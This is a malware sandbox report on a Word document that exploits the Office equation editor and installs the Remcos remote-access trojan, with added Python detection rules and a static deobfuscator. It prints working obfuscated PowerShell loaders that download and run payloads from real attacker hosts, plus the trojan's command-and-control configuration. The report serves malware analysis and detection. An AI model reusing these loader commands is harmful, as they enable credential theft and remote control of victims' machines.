Windows Analysis Report
PO NAHK22012FA00000.docx.doc
Overview
General Information
Detection | Remcos |
---|---|
Score | 100 |
Range | 0 - 100 |
Whitelisted | false |
Confidence | 100% |
Signatures
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains an external reference to another file
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Office viewer loads remote template
PowerShell case anomaly found
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match
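Several of the Sigma hits above (equation editor spawning a child, PowerShell case anomaly, base64 handed to iex / a second powershell, csc.exe compiling from Temp, wscript starting PowerShell) can be reproduced as plain process-creation predicates. The block below is an added example, not Joe Sandbox or Sigma code: it runs such predicates over constructed events modelled on the process tree of this report. The event field names (pid, parent_image, image, command_line) are an assumption to be mapped onto Sysmon Event ID 1 or Security 4688; the parent images are inferred from the order of the tree, which the page does not state explicitly, and the long base64 arguments are shortened to (...). The CasPol check is a heuristic of my own: CasPol.exe has no /stext switch, NirSoft recovery tools do, so a CasPol image running /stext is a hollowed host writing a credential dump.

```python
"""Process-creation checks for the execution chain in this report (added example)."""
import re

# Constructed events modelled on the sandbox process tree; parents are inferred.
EVENTS = [
    {"pid": 3964, "parent_image": "svchost.exe",
     "image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "command_line": r'''"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'''},
    {"pid": 4040, "parent_image": "EQNEDT32.EXE",
     "image": r"C:\Windows\SysWOW64\mshta.exe",
     "command_line": r'''"C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\wennedgreatthingswithgoodnwesforentrie.hta"'''},
    {"pid": 3180, "parent_image": "mshta.exe",
     "image": r"C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE",
     "command_line": r'''"C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'(...)'+[cHAR]34+'))')))"'''},
    {"pid": 2756, "parent_image": "powershell.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "command_line": r'''"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.cmdline"'''},
    {"pid": 1980, "parent_image": "wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '(...)';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo)); powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD'''},
    {"pid": 3764, "parent_image": "CasPol.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe",
     "command_line": r'''C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oexlux"'''},
    # Constructed benign control: an admin script launched from the desktop.
    {"pid": 9999, "parent_image": "explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -File C:\Scripts\inventory.ps1'''},
]

# Spellings a human or a tool legitimately uses; anything else ("BYpass") is an anomaly.
KEYWORDS = {"powershell": {"PowerShell"}, "bypass": set(), "hidden": set(),
            "unrestricted": set(), "noprofile": {"NoProfile"},
            "executionpolicy": {"ExecutionPolicy"}}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def equation_editor_child(ev) -> bool:
    """EQNEDT32.EXE never needs to spawn anything; a child means exploitation."""
    return basename(ev["parent_image"]) == "eqnedt32.exe"


def powershell_case_anomaly(ev) -> bool:
    """Mixed case inside a PowerShell keyword defeats naive string matching."""
    if basename(ev["image"]) not in ("powershell.exe", "pwsh.exe"):
        return False
    for word in re.findall(r"[A-Za-z]+", ev["command_line"]):
        lw = word.lower()
        if lw in KEYWORDS and word not in {lw, lw.upper(), lw.capitalize()} | KEYWORDS[lw]:
            return True
    return False


def base64_to_invoke(ev) -> bool:
    """A base64 blob decoded in the command line and fed to iex or a second powershell."""
    cl = ev["command_line"].lower()
    return (basename(ev["image"]) == "powershell.exe" and "frombase64string" in cl
            and ("iex" in cl or "invoke-expression" in cl or "-command $" in cl))


def csc_from_user_temp(ev) -> bool:
    """Dynamic .NET compilation (Add-Type) with sources in a user-writable Temp path."""
    return (basename(ev["image"]) == "csc.exe"
            and re.search(r"\\appdata\\local\\temp\\", ev["command_line"], re.I) is not None)


def caspol_stext_dump(ev) -> bool:
    """Heuristic: CasPol.exe image running a NirSoft-style '/stext <file>' dump."""
    return (basename(ev["image"]) == "caspol.exe"
            and re.search(r"/stext\s", ev["command_line"], re.I) is not None)


def script_host_to_powershell(ev) -> bool:
    return (basename(ev["parent_image"]) in ("wscript.exe", "cscript.exe")
            and basename(ev["image"]) == "powershell.exe")


RULES = {f.__name__: f for f in (equation_editor_child, powershell_case_anomaly,
                                 base64_to_invoke, csc_from_user_temp,
                                 caspol_stext_dump, script_host_to_powershell)}


def evaluate(events) -> list:
    """Return (pid, rule_name) for every predicate that fires on an event."""
    return [(ev["pid"], name) for ev in events for name, rule in RULES.items() if rule(ev)]


if __name__ == "__main__":
    for pid, name in evaluate(EVENTS):
        print(pid, name)
```

The benign control event is there to show that `powershell_case_anomaly` tolerates the canonical spellings (`PowerShell`, `NoProfile`) while still firing on `POWERsheLl` and `BYpass`; when porting, keep that allow-list small, because every extra accepted spelling is one an attacker can also use.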
Classification
- System is w7x64
- WINWORD.EXE (PID: 3492 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
- EQNEDT32.EXE (PID: 3964 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
- mshta.exe (PID: 4040 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\wennedgreatthingswithgoodnwesforentrie.hta" MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
- powershell.exe (PID: 3180 cmdline: "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'JEZYM0s5RDc1TktmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFZklOSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGNrY1BoYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFXSkxTaU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTUGl1VmssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTXZ1bmphZ0RWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUt4U2tndUgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiciIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEd4ZVNNVkJxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkRlgzSzlENzVOS2Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly84NS4yMTUuMjA2LjgyLzI3MC9pZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29ubWUudElGIiwiJEVudjpBUFBEQVRBXGdldGJlc3R0aGluZ3N3aXRoYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3Nvbi52YlMiLDAsMCk7U3RBclQtU2xlRVAoMyk7U1RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29uLnZiUyI='+[cHAR]34+'))')))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
- powershell.exe (PID: 2052 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe MD5: EB32C070E658937AA9FA9F3AE629B2B8)
- csc.exe (PID: 2756 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.cmdline" MD5: F8F36858B9405FBE27377FD7E8FEC2F2)
- cvtres.exe (PID: 2740 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8872.tmp" "c:\Users\user\AppData\Local\Temp\j0qjax5r\CSC3F30325724544FF3B51B1BF07A1EFBCB.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
- wscript.exe (PID: 3068 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS" MD5: 979D74799EA6C8B8167869A68DF5204A)
- powershell.exe (PID: 1980 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdhVUtpbWFnZVVybCA9IHp0c2h0dHBzOi8vZCcrJ3JpdmUuZ29vZ2xlLmNvbS91YycrJz9leHBvJysncnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHp0czsnKydhVUt3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2FVS2ltYWdlQnl0ZXMgPSBhVUt3JysnZWJDbGllbnQuRG93bmxvYWREYXRhKGFVS2ltYWdlVXJsKTthVUtpbWFnZVRleCcrJ3QgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhhVUtpbWFnZUJ5dGVzKTthVUtzdGFydEZsYWcgPSB6dHM8PEJBU0U2NF9TVEFSVD4+enRzO2FVS2VuZEZsYWcnKycgPSB6dHM8PEJBU0U2NF9FTkQ+Pnp0czthVUtzdGFydEluZGV4ID0gYVVLaW1hZ2VUZXh0LkluZGV4T2YoYVVLc3RhcnRGbGFnKTthVUtlbmRJbmRleCA9IGFVS2ltYWdlVGV4dC5JbmRleE9mKGFVS2VuZEZsYWcpO2FVS3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBhVUtlbmRJbmRleCAtZ3QnKycgJysnYVVLc3RhcnRJbmRleDthVUtzdCcrJ2FydEluZGV4ICs9IGFVS3N0YXJ0RmxhZy5MZW5nJysndGg7YVVLYmFzZTY0TGVuZ3RoID0gYVVLZW5kSW5kZXggLSBhVUtzdGFydEluZGV4O2FVS2JhJysnc2U2NENvbW1hbmQgPSBhVUtpbWFnZVRleHQuU3Vic3RyaW5nKGFVS3N0YXJ0SW5kZXgsIGFVS2Jhc2U2NExlbmd0aCk7YVVLYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoYVVLYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGRyYiBGb3JFYWNoLU9iamVjdCB7IGFVS18gfSlbLTEuLi0oYVVLYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTthVUtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGcm9tQmFzJysnZTY0U3RyaW5nKGFVS2Jhc2U2NFJldmVyc2VkKTthVUtsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoYVVLY29tbWFuZEJ5dGVzKTthVUt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0JysnaG9kKHp0c1ZBSXp0cyk7YVVLdmFpTWUnKyd0aG9kLkludm9rZShhVUtudWxsLCBAKHonKyd0c3R4dC5FQ0RGRlJXLzA3Mi8yOC42MDIuNTEyLjU4Ly86cHR0aHp0cywgenRzZGVzYXRpdmFkb3p0JysncywgenRzZGVzJysnYXRpdmEnKydkb3p0cywgenRzZGVzYXRpdmFkb3p0cywgenRzQ2FzUG9senRzLCB6dHNkZXNhdGl2YWRvenRzLCB6dHNkZScrJ3NhdGl2YWRvenRzLHp0c2Rlc2F0aXZhZG96dHMsenRzJysnZGVzYXRpdmFkb3p0cyx6dHNkZXNhdGl2YWRvenQnKydzLHp0c2Rlc2F0aXZhZG96dHMsJysnenRzZGVzYXRpdmFkb3p0cyx6dHMxenRzLHp0c2Rlc2F0aXZhZG96dHMpKTsnKS5yZXBsYWNFKCdhVUsnLCckJykucmVwbGFjRSgnenRzJyxbc1RSaW5HXVtjSEFyXTM5KS5yZXBsYWNFKCdkcmInLCd8Jyl8IC4gKCAkcFNIb01lWzIxXSskUFNob01FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo)); powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
- powershell.exe (PID: 2924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replacE('aUK','$').replacE('zts',[sTRinG][cHAr]39).replacE('drb','|')| . ( $pSHoMe[21]+$PShoME[34]+'X')" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
- CasPol.exe (PID: 3608 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
- CasPol.exe (PID: 3764 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oexlux" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
- CasPol.exe (PID: 3880 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oexlux" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
- CasPol.exe (PID: 3864 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\yycdupifp" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
- CasPol.exe (PID: 3840 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\jsiovitzdbnf" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
- cleanup
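The PID 1980 command line base64-decodes to the script that PID 2924 then runs, and that script is only executable after its own trailing `.replacE('aUK','$').replacE('zts',[sTRinG][cHAr]39).replacE('drb','|')` calls, piped into `$pSHoMe[21]+$PShoME[34]+'X'` (which spells ieX on a default $PSHOME path). The loader then fetches a "carrier" from Google Drive, cuts out the text between `<<BASE64_START>>` and `<<BASE64_END>>`, reverses it, base64-decodes it, and passes the result to `[System.Reflection.Assembly]::Load`, calling `dnlib.IO.Home.VAI` with a reversed URL as the first argument. The block below is an added example (my code, not the sandbox's or the malware's) that performs these transformations statically so an analyst can recover the indicators without running anything. The two obfuscated excerpts are copied verbatim from the PID 2924 command line; the carrier bytes are constructed, since the real Google Drive file is not on the page. My reading, not stated by the report, is that the remaining Invoke arguments are builder switches (desativado is Portuguese for "disabled") and that the fifth one, CasPol, names the injection host seen in the process tree.

```python
"""Static unwrapping of the obfuscated PowerShell stage in this report (added example)."""
import base64
import re

# Placeholders the stage swaps back at run time: .replacE('aUK','$') ... ('zts', chr 39) ... ('drb','|')
PLACEHOLDERS = {"aUK": "$", "zts": "'", "drb": "|"}

# Verbatim excerpts of the PID 2924 command line, still obfuscated.
OBFUSCATED_URL = (
    "aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id="
    "1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;"
)
OBFUSCATED_INVOKE = (
    "aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, "
    "ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, "
    "ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,"
    "ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));"
)


def detokenize(fragment: str) -> str:
    """Join the 'a'+'b' string fragments, then swap the placeholders back."""
    joined = fragment.replace("'+'", "")
    for token, real in PLACEHOLDERS.items():
        joined = joined.replace(token, real)
    return joined


def invoke_arguments(fragment: str) -> list:
    """Return the string literals handed to Home.VAI via .Invoke($null, @(...))."""
    clear = detokenize(fragment)
    inner = clear[clear.index("@(") + 2 : clear.rindex("))")]
    return re.findall(r"'([^']*)'", inner)


def unreverse(s: str) -> str:
    """The stage reverses strings with -join ($s.ToCharArray())[-1..-($s.Length)]."""
    return s[::-1]


def extract_stage(carrier_text: str) -> bytes:
    """Mirror the loader: slice between the markers, reverse, base64-decode."""
    start_flag, end_flag = "<<BASE64_START>>", "<<BASE64_END>>"
    start = carrier_text.find(start_flag)
    end = carrier_text.find(end_flag)
    if start < 0 or end <= start:
        raise ValueError("carrier has no marked stage")
    start += len(start_flag)
    return base64.b64decode(unreverse(carrier_text[start:end]))


# Constructed carrier: decoy bytes with a fake PE hidden between the markers (not the real file).
FAKE_STAGE = b"MZ" + b"\x00" * 6 + b"constructed-stage-bytes"
CONSTRUCTED_CARRIER = (
    "GIF89a decoy header and padding <<BASE64_START>>"
    + unreverse(base64.b64encode(FAKE_STAGE).decode())
    + "<<BASE64_END>> trailing decoy bytes"
)

if __name__ == "__main__":
    print(detokenize(OBFUSCATED_URL))
    args = invoke_arguments(OBFUSCATED_INVOKE)
    print("second-stage URL:", unreverse(args[0]))
    print("injection host  :", args[4])
    print("stage header    :", extract_stage(CONSTRUCTED_CARRIER)[:2])
```

Running it yields the Google Drive carrier URL in clear, the reversed first Invoke argument as http://85.215.206.82/270/WRFFDCE.txt (the same host the PID 3180 stager, once its base64 is decoded, pulls the .vbS from), and the constructed carrier's stage starting with MZ. Both URLs are indicators only; the example never contacts them.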
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity. | | | |
{"Host:Port:Password": ["servemail.exprotedsteel.pro:6498:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-N6HMP4", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "wordse"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
(not captured) | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. | ditekSHen | |
(not captured) | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | |
(not captured) | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. | ditekSHen | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
(not captured) | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | |
(not captured) | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | |
(not captured) | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | |
(not captured) | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | |
(not captured) | Windows_Trojan_Remcos_b296e965 | unknown | unknown | |
(5 of 20 entries shown)
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
(not captured) | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | |
(not captured) | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | |
(not captured) | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | |
(not captured) | Windows_Trojan_Remcos_b296e965 | unknown | unknown | |
(not captured) | REMCOS_RAT_variants | unknown | unknown | |
(5 of 8 entries shown)
Exploits
Source: (not captured) | Author: Joe Security
Source: (not captured) | Author: Joe Security
System Summary
Source: (not captured) | Author: Florian Roth (Nextron Systems)